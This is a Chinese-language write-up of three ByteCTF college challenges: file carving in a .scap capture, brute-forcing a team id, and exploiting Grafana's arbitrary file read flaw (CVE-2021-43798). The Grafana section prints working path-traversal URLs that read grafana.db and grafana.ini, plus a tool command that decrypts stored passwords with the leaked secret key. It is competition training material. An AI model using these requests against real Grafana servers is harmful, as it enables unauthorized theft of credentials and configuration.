admin管理员组

文章数量:1530013

目录

  • 【题目附件】解压密码:123456
  • 【Misc】find_it
  • 【Misc】signin
  • 【Web】easy_grafana

【题目附件】解压密码:123456

【Misc】find_it

下载的是一个.scap的文件,(把名字改短一点,就叫find_it.scap吧)
通过strings、zsteg也没发现什么正常的,于是试了一下binwalk

发现了很多东西
于是我习惯性的用foremost进行分解(本来是想用binwalk继续操作的)
于是偶然发现了三个png文件,其中一个是一个二维码

二维码扫描结果是flag的前半部分

接下来是找到后半部分flag
经过尝试,将find_it.scap转成可读文件类型进行分析

sysdig -r find_it.scap > findit.txt

打开文件后

搜索“}”,在125820行找到了bec5-d7563b2672b6}.php

结合前半段得到flag
ByteCTF{53f8fb16-a25d-4aac-bec5-d7563b2672b6}

【Misc】signin

这道题打开是这样的

在这里才能下一步

然后欣赏一下套路


接下来就是一堆游戏
最后就是我不知道队伍id,然后就是。。。。

大家可以注意看一下地址栏有个“final”
抓个包爆破一下id

然后得到flag

ByteCTF{Hop3_Y0u_hav3_fun!_30bed8ac}

【Web】easy_grafana

在百度中找“grafana漏洞”的时候发现有个任意文件读取漏洞CVE-2021-43798

根据提供的文章尝试复现,找到数据库,因为浏览器有解码,所以一部分进行url编码后进行利用,最后得出↓

/public/plugins/alertlist/#/../..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/var/lib/grafana/grafana.db

然后在返回的数据中找到了password的关键信息

然后找grafana的配置信息

/public/plugins/alertlist/#/../..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/grafana/grafana.ini

找到了secret_key

把数据库巴拉下来

./grafanaExp_linux_amd64 edcode -f easygrafana.db -k SW2YcwTIb9zpO1hoPsMm

ByteCTF{e292f361-285e-47fc-9210-b9cd233773cb}

本文标签: 挑战赛字节高校COLLEGECTF